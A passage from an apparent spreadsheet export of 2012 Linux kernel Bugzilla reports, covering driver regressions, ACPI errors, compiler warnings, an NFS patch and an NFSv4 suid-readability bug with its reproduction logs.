    <t>[BISECTED]divide error on radeon modprobe</t>
  </si>
  <si>
    <t>2012-08-18 16:32 UTC</t>
  </si>
  <si>
    <t>Brad Jackson</t>
  </si>
  <si>
    <t>2013-11-20 16:13 UTC</t>
  </si>
  <si>
    <t>Created attachment 77901 [details] Trace from message log I have a script that is run by rc.local that runs modprobe radeon, then disables vgaswitcheroo and unloads the radeon module. Excerpt from message log with trace is attached. This started happening in 3.6-rc1 and is still in rc2. It does happen on 3.5.1 and 3.5.2 if the radeon module is manually loaded a second time after boot. Other kernels were not tested.</t>
  </si>
  <si>
    <t>SynPS/2 Synaptics TouchPad missing space</t>
  </si>
  <si>
    <t>3.5.3</t>
  </si>
  <si>
    <t>2012-08-23 14:45 UTC</t>
  </si>
  <si>
    <t>kriha6</t>
  </si>
  <si>
    <t>2012-12-10 19:16 UTC</t>
  </si>
  <si>
    <t>There is "dead" space on the right side of the touchpad that cannot be used. It is insensitive to touching.</t>
  </si>
  <si>
    <t>Brightness hotkeys have no effect on Clevo laptop</t>
  </si>
  <si>
    <t>3.6.2</t>
  </si>
  <si>
    <t>2012-08-24 09:36 UTC</t>
  </si>
  <si>
    <t>YannUbuntu</t>
  </si>
  <si>
    <t>2013-02-08 17:47 UTC</t>
  </si>
  <si>
    <t>Brightness hotkeys (decrease=Fn+F8 , and increase=Fn+F9) have no effect on my Clevo (W240HU/W250HUQ) laptop. - however, brightness control via "System Settings" -&gt; "Brightness and lock" menu (in Ubuntu 12.04) work out-of-the-box. - when adding the "acpi_osi=" option, hotkeys work , but the "Brightness and lock" menu has no effect any more. - more information on http://ubuntuforums.org/showthread.php?t=2046843 and https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1041116</t>
  </si>
  <si>
    <t>ACPI:Dell PowerEdge R310: No handler for Region [IPMI]</t>
  </si>
  <si>
    <t>2.6.32-5-amd64</t>
  </si>
  <si>
    <t>2012-08-31 02:26 UTC</t>
  </si>
  <si>
    <t>2015-04-30 21:01 UTC</t>
  </si>
  <si>
    <t>dmesg shows: [ 19.263075] ACPI Error: No handler for Region [IPMI] (ffff88013ba42240) [IPMI] (20090903/evregion-319) [ 19.263080] ACPI Error: Region IPMI(7) has no handler (20090903/exfldio-295) [ 19.263084] ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PMI0._GHL] (Node ffff88013bc2bd20), AE_NOT_EXIST [ 19.263103] ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PMI0._PMC] (Node ffff88013bc2bca0), AE_NOT_EXIST [ 19.263117] ACPI Exception: AE_NOT_EXIST, Evaluating _PMC (20090903/power_meter-772) uname -a: Linux test 2.6.32-5-amd64 #1 SMP Sun May 6 04:00:17 UTC 2012 x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>Kernel Oops when pressing ACPI display dim-up/down buttons</t>
  </si>
  <si>
    <t>3.4.6-2.10-desktop</t>
  </si>
  <si>
    <t>2012-09-01 09:38 UTC</t>
  </si>
  <si>
    <t>2013-02-08 17:45 UTC</t>
  </si>
  <si>
    <t>After resume from s2ram I wanted to dim down my display (fn-keystroke) getting the following kernel oops (see attachement). After trying to press Alt-Prn-S/U/B both keyboard leds were blinking as for fatal kernel oopses.</t>
  </si>
  <si>
    <t>Kernel Panics During High Workload</t>
  </si>
  <si>
    <t>3.6.0-rc3</t>
  </si>
  <si>
    <t>2012-09-02 00:36 UTC</t>
  </si>
  <si>
    <t>Mike Lothian</t>
  </si>
  <si>
    <t>2013-03-11 03:16 UTC</t>
  </si>
  <si>
    <t>Created attachment 78991 [details] Kernel Config My machine panics when it has a high workload - usually compiling I managed to photograph the panic and I'll attach it, the .config and info from my logs I'm not sure if I've assigned the bug to the right group This bug is reproducable - each time I've tried to recompile icedtea</t>
  </si>
  <si>
    <t>inode.c:157: bad call to memset</t>
  </si>
  <si>
    <t>3.6-rc4</t>
  </si>
  <si>
    <t>2012-09-02 14:49 UTC</t>
  </si>
  <si>
    <t>2012-10-30 18:26 UTC</t>
  </si>
  <si>
    <t>I just tried to compile linux-3.6-rc4 with a recent snapshot of the gcc compiler. It said fs/nfs/inode.c:157:41: warning: argument to ‘sizeof’ in ‘memset’ call is the same pointer type ‘__be32 *’ as the destination; expected ‘__be32’ or an explicit length [-Wsizeof-pointer-memaccess] The source code is memset(NFS_COOKIEVERF(inode), 0, sizeof(NFS_COOKIEVERF(inode))); maybe something like memset(NFS_COOKIEVERF(inode), 0, sizeof(__be32)); might be better.</t>
  </si>
  <si>
    <t>[CHECK]scsi/bnx2fc/bnx2fc_io.c:1810: bad call to memset</t>
  </si>
  <si>
    <t>2012-09-02 14:55 UTC</t>
  </si>
  <si>
    <t>2013-11-20 13:33 UTC</t>
  </si>
  <si>
    <t>I just tried to compile linux-3.6-rc4 with a recent snapshot of the gcc compiler. It said drivers/scsi/bnx2fc/bnx2fc_io.c:1810:41: warning: argument to ‘sizeof’ in ‘memset’ call is the same expression as the destination; did you mean to provide an explicit length? [-Wsizeof-pointer-memaccess] The source code is memset(sc_cmd-&gt;sense_buffer, 0, sizeof(sc_cmd-&gt;sense_buffer)); maybe memset(sc_cmd-&gt;sense_buffer, 0, SCSI_SENSE_BUFFERSIZE); might be better.</t>
  </si>
  <si>
    <t>[PATCH]NFS: fix suppression of default nfs port value in /proc (patch attached)</t>
  </si>
  <si>
    <t>2012-09-03 15:26 UTC</t>
  </si>
  <si>
    <t>2014-01-13 19:08 UTC</t>
  </si>
  <si>
    <t>Created attachment 79101 [details] NFS: fix suppression of default nfs port value in /proc (git formated patch) We have an issue where /proc/mounts does show wrong default values for the port mount option of nfs mounts. when mounting NFS shares with an unspecified port (=0 see nfs(5)) /proc/mounts will show ..,port=65535,.. in the mount options column. This issue has already been fixed before for the (mountd) mountport field and the attached patch fixes it for the (nfs server) port field, too. On a higher level this broke the restart mechanism of am-utils v6.1.5 on a system where /etc/mtab is a link to /proc, because it is impossible to reconstruct mount options. I don't know if this should be tagged as a regression, because I think it may be introduced back in 2009 with commit 4cfd74fc. (But yes, we have issues related to this for some time now). The patch was created on top of tag v3.5.3 and works for me. Please let me know what else to provide to help fix this issue. from the git formated patch: see aa69947399a119d7f1b35bbcd62c849839b35449 where the same issue is fixed for mountd port. (reused some parts of the log message for this commit) Default value for nfs server port is set to NFS_UNSPEC_PORT (-1) and will not be changed during parsing mount options. This default value will be shown for port mount option in /proc/mounts always since current default check is for zero value. This small mistake leads to big problems, when tools try to parse options from /proc/mounts and reuse them to connect to the remote nfs server (e.g. am-utils does this to implement some kind of nfs-ping). This request will be rejected (since port is 65535) and am-utils considers nfs servers of already mounted and running nfs mountpoints as unresponsive and dead and does not collect them.</t>
  </si>
  <si>
    <t>[BISECTED]Regression 3.5 -&gt; 3.6-rc1 commit 63d95a91, BUG at kernel/sched/core.c 1654, always kworker</t>
  </si>
  <si>
    <t>2012-09-10 08:45 UTC</t>
  </si>
  <si>
    <t>2012-11-05 23:14 UTC</t>
  </si>
  <si>
    <t>Created attachment 79561 [details] BUG log BUG at kernel/sched/core.c 1654 invalid opcode: 0000 [#1] SMP Line 1654 is in try_to_wakeup_local: BUG_ON(rq != this_rq()); bisected to 3.6 workqueue merge: commit 63d95a91 workqueue: use @pool instead of @gcwq or @cpu where applicable Given that the description says mechanical changes only, no function changes, maybe an alignment and field ordering change? I don't however have an easy to trigger reproducer, tho time constraints of playing an incoming internet mp3 stream along with doing a (gentoo) system update to hit 100% usage on all 6 cores (bulldozer fx6100 CPU) seems to help, so it's not a 100% certainty that all my bisect goods are actually good and the first bad commit /might/ therefore be a few short of that. But it's close and I THINK that's it. Everything from there on thru 3.6-rc4 at least is bad tho. The result is almost always a dead kernel, but I did happen to get one that still let me do magic-srq along the way and thus got the BUG log. But I didn't have SystemMap installed, so if it would have helped... Anyway, it's attached. I'm setting KCFLAGS. I've not YET tested with generic KCFLAGS but will do so. But 3.5 was fine with the same KCFLAGS, so there's still something funny going on with that commit, even if it turns out that generic KCFLAGS doesn't trigger the problem. Anyway, here they are (not /too/ ricer): KCFLAGS="-march=native -pipe -O2 -frename-registers -fweb -fmerge-all-constants -fgcse-sm -fgcse-las -fgcse-after-reload -ftree-vectorize" Hardware/software environment: AMD "bulldozer" fx-6100 (x86_64 mode) w/ 16 gig RAM, Radeon hd6770 "Turks" 0x6758 w/ 1 gig VRAM, KMS and the native freedomware drivers, ga-990fxa-ud3 mobo, onboard Realtek ALC889 (alsa hda driver), onboard Realtek RTL8111/8168B ethernet (8169 driver), monolithic kernel (no modules), gpt and reiserfs. Gentoo/~amd64, gcc-4.7.1, glibc-2.16.0, xorg-server-1.13.0, xf86-video-ati-6.14.6-r1, mesa-9_pre20120831-r1, kde-4.9.1. I'll attach a kernel config momentarily, then try a generic KCFLAGS build and confirm the problem (or not) with it, tho without a 100% trigger reproducer it might take hours or days to confirm if it's clean.</t>
  </si>
  <si>
    <t>Wrong/impossible cputimes for migration processes</t>
  </si>
  <si>
    <t>&gt;=3.0.7</t>
  </si>
  <si>
    <t>2012-09-10 19:54 UTC</t>
  </si>
  <si>
    <t>gunnar.eggen</t>
  </si>
  <si>
    <t>2014-10-03 22:34 UTC</t>
  </si>
  <si>
    <t>Created attachment 79701 [details] kernel config The cputimes/load reported from top/ps etc. report extreme loads on kernel processes migration/x. The problem isn't permanent as it takes a while to set off, but once it does it escalates and never stops. I am unable to locate what's triggering it, but I did a bisect and found the commit at fault: commit d670ec13178d0fd8680e6742a2bc6e04f28f87d8 - posix-cpu-timers: Cure SMP wobbles. The load reported doesn't seem real, as there's no sign that the system is under heavy load or unresponsive. Compiling with CONFIG_NO_HZ=N seems to help for some, but I've only seen a delay in the triggering of it. Reproducible: Always Steps to Reproduce: 1. Boot normally with kernel &gt;= 3.0.7 2. Wait ~1 hour (unable to figure out what sets it off. Idle vs full load doesn't seem to matter) Actual Results: Cpuload/cputime on some migration/x kernel processes show a constant load between 20-100%. Cpu frequency scaling (ondemand) seems to be affected as it never scales down the cores/threads affected. Expected Results: Report normal load on migration processes. Allow ondemand to scale down. The bug was first reported here: https://bugs.gentoo.org/show_bug.cgi?id=394487</t>
  </si>
  <si>
    <t>ath/ath5k/phy.c:1977: possible missing break ?</t>
  </si>
  <si>
    <t>3.6-rc6</t>
  </si>
  <si>
    <t>2012-09-18 20:04 UTC</t>
  </si>
  <si>
    <t>2012-10-16 13:35 UTC</t>
  </si>
  <si>
    <t>I just ran the static analyser cppcheck over the source code of the linux kernel version 3.6-rc6. It said [linux-3.6-rc6/drivers/net/wireless/ath/ath5k/phy.c:1977]: (warning) Redundant assignment of "symbol_width" in switch The source code is case AR5K_BWMODE_10MHZ: /* Both sample_freq and chip_freq are 20MHz (?) */ spur_delta_phase = (spur_offset &lt;&lt; 18) / 25; spur_freq_sigma_delta = (spur_delta_phase &gt;&gt; 10); symbol_width = AR5K_SPUR_SYMBOL_WIDTH_BASE_100Hz / 2; case AR5K_BWMODE_5MHZ: /* Both sample_freq and chip_freq are 10MHz (?) */ spur_delta_phase = (spur_offset &lt;&lt; 19) / 25; spur_freq_sigma_delta = (spur_delta_phase &gt;&gt; 10); symbol_width = AR5K_SPUR_SYMBOL_WIDTH_BASE_100Hz / 4; default: I agree with cppcheck, I think there are some missing break statements in these cases.</t>
  </si>
  <si>
    <t>Brightness controls on Compaq 6720s break in 3.4-rc1 commit</t>
  </si>
  <si>
    <t>3.4-rc1 - 3.6-rc6</t>
  </si>
  <si>
    <t>2012-09-23 15:45 UTC</t>
  </si>
  <si>
    <t>Stefan Wilkens</t>
  </si>
  <si>
    <t>2013-11-15 12:22 UTC</t>
  </si>
  <si>
    <t>Created attachment 80861 [details] relevant data (dmesg, lspci etc) [1.] One line summary of the problem: Brightness controls on Compaq 6720s break in 3.4-rc1 commit. [2.] Full description of the problem/report: My Compaq 6720s laptop features a Fn key that allows for some features of the laptop to be controlled. One of these features is the LCD's brightness / backlight, specifically controlled though Fn + F{7,8}. A bisect (log attached) shows that commit ea9f8856bd6d4ed45885b06a338f7362cd6c60e5 first causes this issue, being that the key combination no longer causes the LCD's brightness to vary. Brightness can still be controlled through /proc and DE (Gnome 3.x), however both Fn + F7 and Fn + F8 no longer produce scancodes and are unable to manipulate the LCD's brightness. [3.] Keywords (i.e., modules, networking, kernel): backlight, brightness, 3.4-rc1, acpi, kernel, 6720s [4.] Kernel version (from /proc/version): first occurs in vanilla 3.4-rc1, issue remains in current vanilla 3.6-rc6 [5.] Output of Oops.. message (if applicable) with symbolic information resolved (see Documentation/oops-tracing.txt) not applicable [6.] A small shell script or example program which triggers the problem (if possible) not applicable [7.] Environment Arch Linux @ 3.5.4 (rolling release) GNOME 3.4.2</t>
  </si>
  <si>
    <t>rt73usb WARNING: at net/mac80211/driver-ops.h:12 check_sdata_in_driver</t>
  </si>
  <si>
    <t>&gt;= 3.5</t>
  </si>
  <si>
    <t>2012-09-28 12:44 UTC</t>
  </si>
  <si>
    <t>2012-11-06 12:28 UTC</t>
  </si>
  <si>
    <t>Subject : rt73usb WARNING: at net/mac80211/driver-ops.h:12 check_sdata_in_driver Submitter : Stephen Boyd &lt;bebarino@gmail.com&gt; Date : Thu, 20 Sep 2012 01:34:39 -0700 Message-ID : &lt;505AD51F.7050709@gmail.com&gt; References : https://lkml.org/lkml/2012/9/20/82 Hi, I've noticed that if I suspend to disk and then resume with my usb wifi adapter plugged in I get a spew of these warnings from what looks to be the wifi driver and some warning from the usb layer. Are these known issues? rt73usb 1-2:1.0: no reset_resume for driver rt73usb? WARNING: at net/mac80211/driver-ops.h:12 check_sdata_in_driver+0x32/0x34() Hardware name: MS-7094 wlan0: Failed check-sdata-in-driver check, flags: 0x4 Modules linked in: snd_seq_midi snd_emu10k1_synth snd_emux_synth snd_seq_virmidi snd_seq_midi_emul snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_pcm_oss snd_mixer_oss radeon snd_emu10k1 snd_rawmidi snd_ac97_codec ac97_bus ttm drm_kms_helper snd_pcm snd_seq_device snd_timer drm snd_page_alloc snd_util_mem snd_hwdep snd i2c_algo_bit rt73usb crc_itu_t rt2x00usb cfbcopyarea cfbimgblt rt2x00lib cfbfillrect parport_pc edac_core via82cxxx edac_mce_amd floppy parport soundcore k8temp powernow_k8 mperf r8169 mii Pid: 2525, comm: kworker/u:14 Not tainted 3.6.0-rc6-00052-gc46de22 #126 Call Trace: [&lt;ffffffff8102e13a&gt;] warn_slowpath_common+0x85/0x9d [&lt;ffffffff8102e1f5&gt;] warn_slowpath_fmt+0x46/0x48 [&lt;ffffffff81495f1f&gt;] check_sdata_in_driver+0x32/0x34 [&lt;ffffffff81497f20&gt;] drv_mgd_prepare_tx+0x33/0xda [&lt;ffffffff81498099&gt;] ieee80211_send_deauth_disassoc+0xd2/0xeb [&lt;ffffffff81498db8&gt;] ieee80211_set_disassoc+0x169/0x2ab [&lt;ffffffff814990d8&gt;] ieee80211_mgd_deauth+0xc0/0x155 [&lt;ffffffff81477f5e&gt;] ieee80211_deauth+0x18/0x1a [&lt;ffffffff8145ec09&gt;] __cfg80211_mlme_deauth+0xd9/0xec [&lt;ffffffff8146210a&gt;] __cfg80211_disconnect+0x12d/0x1a5 [&lt;ffffffff8144b1a3&gt;] ? cfg80211_netdev_notifier_call+0x2ba/0x559 [&lt;ffffffff8144b1d9&gt;] cfg80211_netdev_notifier_call+0x2f0/0x559 [&lt;ffffffff814b54bf&gt;] notifier_call_chain+0x68/0x9c [&lt;ffffffff814afb9c&gt;] ? __mutex_lock_common+0x322/0x34e [&lt;ffffffff81052311&gt;] raw_notifier_call_chain+0x14/0x16 [&lt;ffffffff813846ac&gt;] call_netdevice_notifiers+0x4a/0x4f [&lt;ffffffff81384710&gt;] __dev_close_many+0x5f/0xbf [&lt;ffffffff81384827&gt;] dev_close_many+0x71/0xd9 [&lt;ffffffff813849a9&gt;] rollback_registered_many+0xcf/0x29a [&lt;ffffffff81384b8d&gt;] unregister_netdevice_many+0x19/0x51 [&lt;ffffffff81473389&gt;] ieee80211_remove_interfaces+0xa6/0xbd [&lt;ffffffff81466236&gt;] ieee80211_unregister_hw+0x53/0x101 [&lt;ffffffffa0087bea&gt;] rt2x00lib_remove_dev+0xe4/0x16d [rt2x00lib] [&lt;ffffffffa00a00cc&gt;] rt2x00usb_disconnect+0x2e/0x61 [rt2x00usb] [&lt;ffffffff8132c07d&gt;] usb_unbind_interface+0x7f/0x160 [&lt;ffffffff812c5103&gt;] __device_release_driver+0x86/0xd9 [&lt;ffffffff812c5237&gt;] device_release_driver+0x25/0x32 [&lt;ffffffff8132c3dd&gt;] usb_driver_release_interface+0x4c/0x82 [&lt;ffffffff8132c45b&gt;] usb_forced_unbind_intf+0x48/0x51 [&lt;ffffffff8132c4db&gt;] usb_resume+0x77/0xa1 [&lt;ffffffff8131e91d&gt;] ? usb_disabled+0x12/0x12 [&lt;ffffffff8131e930&gt;] usb_dev_restore+0x13/0x15 [&lt;ffffffff812cb460&gt;] dpm_run_callback+0x4a/0x88 [&lt;ffffffff812cc4be&gt;] device_resume+0x145/0x184 [&lt;ffffffff812cc735&gt;] async_resume+0x21/0x48 [&lt;ffffffff81053768&gt;] async_run_entry_fn+0x9a/0x152 [&lt;ffffffff81048a9b&gt;] process_one_work+0x273/0x3f6 [&lt;ffffffff810489f7&gt;] ? process_one_work+0x1cf/0x3f6 [&lt;ffffffff810536ce&gt;] ? async_schedule+0x17/0x17 [&lt;ffffffff81049024&gt;] worker_thread+0x226/0x2ea [&lt;ffffffff81048dfe&gt;] ? rescuer_thread+0x1e0/0x1e0 [&lt;ffffffff8104ccf6&gt;] kthread+0xa4/0xac [&lt;ffffffff81074ca1&gt;] ? trace_hardirqs_on_caller+0x16/0x161 [&lt;ffffffff814b9e24&gt;] kernel_thread_helper+0x4/0x10 [&lt;ffffffff814b2219&gt;] ? retint_restore_args+0xe/0xe [&lt;ffffffff8104cc52&gt;] ? __init_kthread_worker+0x5b/0x5b [&lt;ffffffff814b9e20&gt;] ? gs_change+0xb/0xb</t>
  </si>
  <si>
    <t>ieee80211 phy0: brcms_c_prec_enq_head: No where to go, prec == 4</t>
  </si>
  <si>
    <t>2012-10-01 16:29 UTC</t>
  </si>
  <si>
    <t>2013-01-24 14:28 UTC</t>
  </si>
  <si>
    <t>brcm80211 driver developers</t>
  </si>
  <si>
    <t>I have tons of 'brcms_c_prec_enq_head: No where to go, prec == 4' messages in dmesg, practically they overwrite all other messages from the buffer: &gt; [root@dhcp-31-100 ~]# dmesg | grep -c 'brcms_c_prec_enq_head: No where to go, prec == 4' &gt; 4226 This happen when downloading file using wget through WPA2-enterprise 11g network.</t>
  </si>
  <si>
    <t>PCIe root port runtime suspend does not keep proper track of VGA child</t>
  </si>
  <si>
    <t>Run-Time-PM</t>
  </si>
  <si>
    <t>3.6.0</t>
  </si>
  <si>
    <t>2012-10-02 17:59 UTC</t>
  </si>
  <si>
    <t>2013-04-01 21:07 UTC</t>
  </si>
  <si>
    <t>I have the following root port and device on root port: [root@otc-bromolow power]# lspci -v -s 00:1c.5 00:1c.5 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 6 (rev b5) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 Memory behind bridge: c0000000-c18fffff Capabilities: [40] Express Root Port (Slot+), MSI 00 Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit- Capabilities: [90] Subsystem: Intel Corporation Device 7270 Capabilities: [a0] Power Management version 2 Capabilities: [100] Advanced Error Reporting Kernel driver in use: pcieport [root@otc-bromolow power]# lspci -v -s 03:00.0 03:00.0 VGA compatible controller: Matrox Graphics, Inc. MGA G200e [Pilot] ServerEngines (SEP1) (rev 07) (prog-if 00 [VGA controller]) Subsystem: Intel Corporation Device 0102 Flags: bus master, fast devsel, latency 0, IRQ 11 Memory at c0000000 (32-bit, non-prefetchable) [size=16M] Memory at c1810000 (32-bit, non-prefetchable) [size=16K] Memory at c1000000 (32-bit, non-prefetchable) [size=8M] Expansion ROM at c1800000 [disabled] [size=64K] Capabilities: [dc] Power Management version 2 Capabilities: [e4] Express Legacy Endpoint, MSI 00 Capabilities: [54] MSI: Enable- Count=1/1 Maskable- 64bit- The VGA controller forbids runtime suspend, however, I can still runtime suspend the root port. This causes the VGA controller to stop working. If I then resume the root port (echo on &gt; power/control), the VGA card starts working again. I think the expected behavior should be that if the VGA card is still in use, we should not be able to runtime suspend the root port.</t>
  </si>
  <si>
    <t>write to NVS at S3 takes 40 seconds on Bromolow system</t>
  </si>
  <si>
    <t>2012-10-03 23:10 UTC</t>
  </si>
  <si>
    <t>2013-04-07 06:41 UTC</t>
  </si>
  <si>
    <t>I have the following memory reserved for NVS: [kristen@otc-bromolow ~]$ dmesg | grep "ACPI NVS" [ 0.000000] BIOS-e820: [mem 0x00000000ab9a6000-0x00000000bba26fff] ACPI NVS [ 0.000000] BIOS-e820: [mem 0x00000000bede0000-0x00000000befdffff] ACPI NVS on s3 resume, it takes about 40 seconds to write this memory, making suspend take 40 seconds longer than it should. I can use nonvs, but then we don't write the memory out at s4 time, which we should according to the ACPI spec.</t>
  </si>
  <si>
    <t>brcmsmac: random stalls</t>
  </si>
  <si>
    <t>2012-10-05 09:11 UTC</t>
  </si>
  <si>
    <t>2013-01-24 14:34 UTC</t>
  </si>
  <si>
    <t>I can observe random connection stalls, which takes about 30 seconds and then automatically recovers. Unfortunetly I can not rally tell what are steps to reproduce that problem, it happens at random. In dmesg there are following messages, not sure if related through, I have some of them even if problem do not show up. ieee80211 phy0: brcms_c_sendampdu: No fifo space !! ieee80211 phy0: wl0: sendampdu: prep_xdu retry; seq 0x0 ieee80211 phy0: brcms_c_sendampdu: No fifo space !! ieee80211 phy0: wl0: sendampdu: prep_xdu retry; seq 0x0 ieee80211 phy0: brcms_c_ampdu_dotxstatus_complete: Pkt tx suppressed, illegal channel possibly 1 Feel free to ask me for more info, you think might be useful to track down this bug.</t>
  </si>
  <si>
    <t>3.6.1</t>
  </si>
  <si>
    <t>Sony Vaio VPCEB1S1E requires acpi_sleep=nonvs</t>
  </si>
  <si>
    <t>2012-10-14 12:56 UTC</t>
  </si>
  <si>
    <t>Sébastien Wilmet</t>
  </si>
  <si>
    <t>2013-02-19 05:22 UTC</t>
  </si>
  <si>
    <t>Exactly the same issue as bug #34722, but for another Vaio laptop: The acpi_sleep=nonvs kernel parameter is required for suspend/resume to work correctly on Sony Vaio VPCEB1S1E laptops. Else, the computer seems to be well suspended, but it reboots instead of resuming. From dmidecode, here's the relevant info: System Information Manufacturer: Sony Corporation Product Name: VPCEB1S1E Thanks in advance!</t>
  </si>
  <si>
    <t>bisected hang on suspend or reboot caused by RCU commit</t>
  </si>
  <si>
    <t>3.6.0 rc6</t>
  </si>
  <si>
    <t>2012-10-17 21:50 UTC</t>
  </si>
  <si>
    <t>2012-10-21 20:36 UTC</t>
  </si>
  <si>
    <t>Created attachment 83761 [details] dmesg from failed suspend I have a problem on suspend or reboot - the system hangs during going to sleep or during restart (just before the system gets sleeping or gets restarted). The sleep is only partial - the wifi led goes off, but nothing more. I've bisected the problem to commit 755609a9087fa983f567dc5452b2fa7b089b591f (rcu: Allow RCU grace-period initialization to be preempted), which is a first bad commit.</t>
  </si>
  <si>
    <t>commit breaks the ability to turn on and off my nvidia optimus card</t>
  </si>
  <si>
    <t>3.6 and up</t>
  </si>
  <si>
    <t>2012-10-17 22:54 UTC</t>
  </si>
  <si>
    <t>Forrest Loomis</t>
  </si>
  <si>
    <t>2013-01-28 23:11 UTC</t>
  </si>
  <si>
    <t>I recently upgraded to linux 3.6 in the testing repo in Arch Linux and to my dismay found that bbswitch was no longer able to power on and off my NVIDIA optimus card. I bisected the kernel and found that it stopped working at commit 71a83bd727cc31c5fe960c3758cb396267ff710e I posted a bug report with the programmers behind bumblebee / bbswitch at https://github.com/Bumblebee-Project/bbswitch/issues/35 and we could use some help finding out why we are seeing this error! Thanks so much!</t>
  </si>
  <si>
    <t>disable_nonboot_cpus() : Kernel freezes when reboot</t>
  </si>
  <si>
    <t>3.0.46, 3.6.2, 3.7</t>
  </si>
  <si>
    <t>2012-10-18 07:24 UTC</t>
  </si>
  <si>
    <t>finidine</t>
  </si>
  <si>
    <t>2013-11-19 22:44 UTC</t>
  </si>
  <si>
    <t>System freezes only when reboot. Userspace seems to finish OK, disks are unmounted cleanly. Another user reports kernel panic, not in my case. Simply rolling back to previous versions (3.0.45 or 3.5.7) the problem dissapears. Tested on two machines, one with CPU AMD Phenom II X4, the other a single-core processor. Only occurs on the multicore. Reviewing the changelog for both kernels I could see a commit related to behavior on reboot (f96972f2dc6365421cf2366ebd61ee4cf060c8d5 upstream) kernel/sys.c: call disable_nonboot_cpus() in kernel_restart()</t>
  </si>
  <si>
    <t>NFSv4 still broken for suid applications</t>
  </si>
  <si>
    <t>2012-10-19 16:14 UTC</t>
  </si>
  <si>
    <t>2013-11-19 22:42 UTC</t>
  </si>
  <si>
    <t>On NFSv4 suid applications that should only be executable but not readable are still readable until the application is executed for the first time. After the application was executed at least once any attempt to read the suid binary is denied, but any attempt to execute the suid binary is denied, too. NFSv3 works as expected. This prevents NFSv4 usage for any mount that doesn't have a 'nosuid' mount option and in fact is a security problem as unprivileged users can read applications for which they do not have read permission. The NFS server (v3 and v4) is a 64 bit 3.6.2 system. The nfs client shown below is a 32 bit 3.6.2 virtual system (the behaviour of a 64 bit client virtual system running 3.6.2 is identical). Now here the NFSv4 base test just after boot and having logged in via ssh: ========================================================================== admin@evil ~ $ mount rootfs on / type rootfs (rw) 10.1.9.12:/nfsroot-evil/ on / type nfs4 (rw,noatime,nodiratime,vers=4.0,rsize=1048576,wsize=1048576,namlen=255,hard,proto=tcp,port=0,timeo=600,retrans=2,sec=sys,clientaddr=10.1.9.25,local_lock=none,addr=10.1.9.12) none on /dev type devtmpfs (rw,relatime,size=1036672k,nr_inodes=221377,mode=755) none on /proc type proc (rw,noatime,nodiratime) tmpfs on /run type tmpfs (rw,nosuid,nodev,relatime,mode=755) none on /sys type sysfs (rw,noatime,nodiratime) debugfs on /sys/kernel/debug type debugfs (rw,nosuid,nodev,noexec,relatime) cgroup_root on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,relatime,size=10240k,mode=755) openrc on /sys/fs/cgroup/openrc type cgroup (rw,nosuid,nodev,noexec,relatime,release_agent=/lib/rc/sh/cgroup-release-agent.sh,name=openrc) cpuset on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset) cpu on /sys/fs/cgroup/cpu type cgroup (rw,nosuid,nodev,noexec,relatime,cpu) cpuacct on /sys/fs/cgroup/cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpuacct) freezer on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer) none on /dev/pts type devpts (rw,noatime,nodiratime,mode=600) none on /dev/shm type tmpfs (rw,noatime,nodiratime) rpc_pipefs on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw) admin@evil ~ $ ls -l /bin/su -rws--x--x 1 root root 35088 Jul 20 22:49 /bin/su admin@evil ~ $ id uid=61(admin) gid=100(users) groups=100(users),10(wheel) admin@evil ~ $ su - Password: evil ~ # id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),26(tape),27(video) evil ~ # exit logout admin@evil ~ $ cat /bin/su cat: /bin/su: Permission denied admin@evil ~ $ su - -bash: /bin/su: Permission denied admin@evil ~ $ Then another NFSv4 test again logged in just after boot with ssh: ================================================================= admin@evil ~ $ cat /bin/su &gt; /dev/null admin@evil ~ $ ls -l /bin/su -rws--x--x 1 root root 35088 Jul 20 22:49 /bin/su admin@evil ~ $ cat /bin/su &gt; /dev/null admin@evil ~ $ ls -l /bin/su -rws--x--x 1 root root 35088 Jul 20 22:49 /bin/su admin@evil ~ $ cat /bin/su &gt; /dev/null admin@evil ~ $ su - Password: evil ~ # exit logout admin@evil ~ $ cat /bin/su &gt; /dev/null cat: /bin/su: Permission denied admin@evil ~ $ su - -bash: /bin/su: Permission denied admin@evil ~ $ For reference same system booted with NFSv3, and just logged in after boot: =========================================================================== rootfs on / type rootfs (rw) 10.1.9.12:/kvm/evil/nfsroot/ on / type nfs (rw,relatime,vers=3,rsize=8192,wsize=8192,namlen=255,hard,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.1.9.12,mountvers=3,mountproto=tcp,local_lock=all,addr=10.1.9.12) devtmpfs on /dev type devtmpfs (rw,relatime,size=1037204k,nr_inodes=221642,mode=755) none on /proc type proc (rw,noatime,nodiratime) tmpfs on /run type tmpfs (rw,nosuid,nodev,relatime,mode=755) none on /sys type sysfs (rw,noatime,nodiratime) debugfs on /sys/kernel/debug type debugfs (rw,nosuid,nodev,noexec,relatime) cgroup_root on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,relatime,size=10240k,mode=755) openrc on /sys/fs/cgroup/openrc type cgroup (rw,nosuid,nodev,noexec,relatime,release_agent=/lib/rc/sh/cgroup-release-agent.sh,name=openrc) cpuset on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset) cpu on /sys/fs/cgroup/cpu type cgroup (rw,nosuid,nodev,noexec,relatime,cpu) cpuacct on /sys/fs/cgroup/cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpuacct) freezer on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer) none on /dev/pts type devpts (rw,noatime,nodiratime,mode=600) none on /dev/shm type tmpfs (rw,noatime,nodiratime) rpc_pipefs on /var/lib/nfs/rpc_pipefs type 